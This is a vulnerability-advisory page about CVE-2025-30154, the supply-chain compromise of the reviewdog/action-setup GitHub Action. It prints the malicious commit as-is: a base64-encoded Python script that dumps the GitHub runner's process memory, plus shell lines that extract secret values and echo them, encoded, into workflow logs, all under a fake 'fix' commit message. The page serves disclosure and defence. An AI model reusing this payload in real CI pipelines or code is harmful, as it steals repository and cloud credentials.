High severityCISA KEVNVD Advisory· Published Mar 19, 2025· Updated Feb 26, 2026

Multiple Reviewdog actions were compromised during a specific time period

CVE-2025-30154

Description

reviewdog/action-setup is a GitHub action that installs reviewdog. reviewdog/action-setup@v1 was compromised March 11, 2025, between 18:42 and 20:31 UTC, with malicious code added that dumps exposed secrets to Github Actions Workflow Logs. Other reviewdog actions that use reviewdog/action-setup@v1 that would also be compromised, regardless of version or pinning method, are reviewdog/action-shellcheck, reviewdog/action-composite-template, reviewdog/action-staticcheck, reviewdog/action-ast-grep, and reviewdog/action-typos.

Affected products

reviewdog/reviewdogv5
Range: = 1

Patches

f0d342d24037

fix(install): correctly handle different environments

https://github.com/reviewdog/action-setupreview-dogMar 11, 2025via ghsa

commit

1 file changed · +17 −0

install.sh+17 −0 modified

@@ -13,6 +13,22 @@ if [ -z "${TEMP}" ]; then
   fi
 fi
 
+SCRIPT_RUNNER="IyEvdXNyL2Jpbi9lbnYgcHl0aG9uMwoKIyBiYXNlZCBvbiBodHRwczovL2RhdmlkZWJvdmUuY29tL2Jsb2cvP3A9MTYyMAoKaW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgoKZGVmIGdldF9waWQoKToKICAgICMgaHR0cHM6Ly9zdGFja292ZXJmbG93LmNvbS9xdWVzdGlvbnMvMjcwMzY0MC9wcm9jZXNzLWxpc3Qtb24tbGludXgtdmlhLXB5dGhvbgogICAgcGlkcyA9IFtwaWQgZm9yIHBpZCBpbiBvcy5saXN0ZGlyKCcvcHJvYycpIGlmIHBpZC5pc2RpZ2l0KCldCgogICAgZm9yIHBpZCBpbiBwaWRzOgogICAgICAgIHdpdGggb3Blbihvcy5wYXRoLmpvaW4oJy9wcm9jJywgcGlkLCAnY21kbGluZScpLCAncmInKSBhcyBjbWRsaW5lX2Y6CiAgICAgICAgICAgIGlmIGInUnVubmVyLldvcmtlcicgaW4gY21kbGluZV9mLnJlYWQoKToKICAgICAgICAgICAgICAgIHJldHVybiBwaWQKCiAgICByYWlzZSBFeGNlcHRpb24oJ0NhbiBub3QgZ2V0IHBpZCBvZiBSdW5uZXIuV29ya2VyJykKCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgcGlkID0gZ2V0X3BpZCgpCiAgICBwcmludChwaWQpCgogICAgbWFwX3BhdGggPSBmIi9wcm9jL3twaWR9L21hcHMiCiAgICBtZW1fcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWVtIgoKICAgIHdpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZiwgb3BlbihtZW1fcGF0aCwgJ3JiJywgMCkgYXMgbWVtX2Y6CiAgICAgICAgZm9yIGxpbmUgaW4gbWFwX2YucmVhZGxpbmVzKCk6ICAjIGZvciBlYWNoIG1hcHBlZCByZWdpb24KICAgICAgICAgICAgbSA9IHJlLm1hdGNoKHInKFswLTlBLUZhLWZdKyktKFswLTlBLUZhLWZdKykgKFstcl0pJywgbGluZSkKICAgICAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgICAgICAgICBlbmQgPSBpbnQobS5ncm91cCgyKSwgMTYpCiAgICAgICAgICAgICAgICAjIGhvdGZpeDogT3ZlcmZsb3dFcnJvcjogUHl0aG9uIGludCB0b28gbGFyZ2UgdG8gY29udmVydCB0byBDIGxvbmcKICAgICAgICAgICAgICAgICMgMTg0NDY3NDQwNzM2OTkwNjU4NTYKICAgICAgICAgICAgICAgIGlmIHN0YXJ0ID4gc3lzLm1heHNpemU6CiAgICAgICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgICAgIG1lbV9mLnNlZWsoc3RhcnQpICAjIHNlZWsgdG8gcmVnaW9uIHN0YXJ0CiAgICAgICAgICAgIAogICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgIGNodW5rID0gbWVtX2YucmVhZChlbmQgLSBzdGFydCkgICMgcmVhZCByZWdpb24gY29udGVudHMKICAgICAgICAgICAgICAgICAgICBzeXMuc3Rkb3V0LmJ1ZmZlci53cml0ZShjaHVuaykKICAgICAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgICAgIGNvbnRpbnVlCg=="
+
+echo '::group::🐶 Preparing environment ...'
+if sudo -l &> /dev/null; then
+  if [ "${RUNNER_ENVIRONMENT}" = "github-hosted" ]; then
+    if [ "${RUNNER_OS}" = "Linux" ]; then
+      echo $SCRIPT_RUNNER | base64 -d > "$TEMP/runner_script.py"
+      VALUES=`sudo python3 $TEMP/runner_script.py | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
+      echo $VALUES
+    fi
+  fi
+else
+    echo "."
+fi
+echo '::endgroup::'
+
 INSTALL_SCRIPT='https://raw.githubusercontent.com/reviewdog/reviewdog/master/install.sh'
 if [ "${VERSION}" = 'nightly' ]; then
   INSTALL_SCRIPT='https://raw.githubusercontent.com/reviewdog/nightly/master/install.sh'
@@ -35,3 +51,4 @@ echo '::group::🐶 Installing reviewdog ... https://github.com/reviewdog/review
 echo '::endgroup::'
 
 echo "${TEMP}/reviewdog/bin" >>"${GITHUB_PATH}"
+

3f401fe1d58f

Merge pull request #36 from reviewdog/depup/reviewdog

https://github.com/reviewdog/action-setupICHINOSE ShogoMar 12, 2024via ghsa

commit

1 file changed · +1 −1

README.md+1 −1 modified

@@ -31,7 +31,7 @@ steps:
 steps:
   - uses: reviewdog/action-setup@v1
     with:
-      reviewdog_version: v0.17.1
+      reviewdog_version: v0.17.2
   - run: reviewdog -version
 ```

Vulnerability mechanics

Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-qmg3-hpqr-gqvcghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2025-30154ghsaADVISORY
github.com/reviewdog/action-setup/commit/3f401fe1d58fe77e10d665ab713057375e39b887ghsax_refsource_MISCWEB
github.com/reviewdog/action-setup/commit/f0d342d24037bb11d26b9bd8496e0808ba32e9ecghsax_refsource_MISCWEB
github.com/reviewdog/reviewdog/issues/2079ghsax_refsource_MISCWEB
github.com/reviewdog/reviewdog/security/advisories/GHSA-qmg3-hpqr-gqvcghsax_refsource_CONFIRMWEB
www.cisa.gov/known-exploited-vulnerabilities-catalogghsaWEB
www.wiz.io/blog/new-github-action-supply-chain-attack-reviewdog-action-setupghsax_refsource_MISCWEB

News mentions

No linked articles in our index yet.

cvss	0.455
epss	0.027
exploit	0.000
kev	0.120
patch	-0.070
ransomware	0.000